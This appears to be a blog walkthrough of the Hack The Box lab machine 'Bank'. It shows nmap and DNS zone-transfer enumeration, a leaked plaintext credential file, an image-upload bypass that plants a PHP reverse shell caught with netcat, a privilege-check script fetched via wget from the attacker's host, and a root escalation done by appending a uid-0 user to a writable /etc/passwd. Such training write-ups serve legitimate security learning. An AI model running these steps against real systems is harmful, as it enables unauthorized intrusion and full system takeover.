BANK

Enumeration

NMAP

The nmap scan reveals port 53, 80 and 22 open so we could assume that there is an http web application, DNS and ssh services. Let’s enumerate the DNS and check out the findings in our browser.

Host is up (0.047s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

DNS Enumeration

# dig axfr @10.10.10.29 bank.htb      

; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.               604800  IN      NS      ns.bank.htb.
bank.htb.               604800  IN      A       10.10.10.29
ns.bank.htb.            604800  IN      A       10.10.10.29
www.bank.htb.           604800  IN      CNAME   bank.htb.
bank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Tue May 11 03:28:16 EDT 2021
;; XFR size: 6 records (messages 1, bytes 171)

Web App Enumeration

/etc/hosts

Add the IP address to our known hosts file in /etc/hosts as:

10.10.10.29        bank.htb chris.bank.htb ns.bank.htb

`

chris.bank.htb bank.htb ns.bank.htb

Dirbuster

A couple of interesting directories were found for http://bank.htb including not present in the picture is /balance-transfer/ directory since the scan was still running.

user and ticket files does not return anything but header redirects to a / which seems unusually big from within burpsuite.

/balance-transfer/

Balance transfer is directory which contains a bunch of encrypted accounts. While scrolling through the directory, looking for something out of the ordinary, I found a file that is 50% smaller than the rest of the files.

When opened, It seems that encryption failed since it is in plain text:

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

Exploit

I have logged in to the given account and discovered a Support page which provides file upload functionality which reveals a possible attack surface.

LFI

There is a file upload restriction in place that prevent me from uploading anything other than images. Let’s bypass that with burp suite.

Burp Suite

After configuring our php-reverse-shell.php to point to our own IP address from pentestmonkey, we try to upload it into the file upload form while having intercept on. After we capture the POST request, we send it to Repeater in order to debunk the restrictions in place. And voila…

Shell

Open a nc listener that will intercept the reverse call and execute the file.

$ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php                                        
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5492  100  5492    0     0  53843      0 --:--:-- --:--:-- --:--:-- 53843
PHP Notice:  Undefined variable: daemon in Standard input code on line 184
Successfully opened reverse shell to 10.10.14.3:1234

Yikes, I just hacked myself

Anyway… let’s try to forget about that and figure out my next move NOT to hack myself. I read in the source code that the developer added an exception for the htb extension for debugging purposes and that files with such extension will be executed as php. So I have uploaded the reverse shell as an htb and just opened it which returned a shell.

# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 12:37:52 up  2:18,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ 

Privilege Escalation

We are logged as www-data. In order to figure out our attack surface, I will run a script called unix-privesc-check. In the following lines, I am going to folder /tmp because it is writeable directory and download the file from my local kali system.

┌──(kali㉿kali)-[~/bank]
└─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check .      

┌──(kali㉿kali)-[~/bank]
└─$ python3 -m http.server                                 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 -
10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 -
$ cd tmp
$ touch file
$ ls
file
vmware-root
$ wget http://10.10.14.3:8000/unix-privesc-check
--2021-05-11 12:45:15--  http://10.10.14.3:8000/unix-privesc-check
Connecting to 10.10.14.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K) [application/octet-stream]
Saving to: 'unix-privesc-check'

     0K .......... .......... .......... .....                100%  654K=0.05s

2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801]

$ 

Let’s upgrade out session to be more intuitive and responsive.

$ python -c 'import pty;pty.spawn("/bin/bash")'                 
[email protected]:/tmp$ export TERM=xterm                                                                                
export TERM=xterm                                                                                                    
[email protected]:/tmp$ ^Z                                                                                               
zsh: suspended  nc -nlvp 1234                                                                                        

┌──(root💀kali)-[/home/kali/bank]
└─# stty raw -echo;fg                                                                                      148 ⨯ 1 ⚙
[1]  + continued  nc -nlvp 1234

Now I have tab-completion and all keys register as normal.

[email protected]:/tmp$ chmod +x unix-privesc-check

[email protected]:/tmp$ ./unix-privesc-check standard

...[snip]...
############################################
    Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd

Ok, so we have a writeable /etc/passwd file. Let’s add a privileged user and escalate. Firstly, create a password:

$ openssl passwd -1 -salt hacker hacker
$1$hacker$TzyKlv0/R/c28R.GAeLw.1

Next, add the user as follows:

[email protected]:/$ nano /etc/passwd
#################################
add the user in the document like so:
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
#################################
[email protected]:/$ su hacker
Password: 
[email protected]:/# whoami
root
[email protected]:/# 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: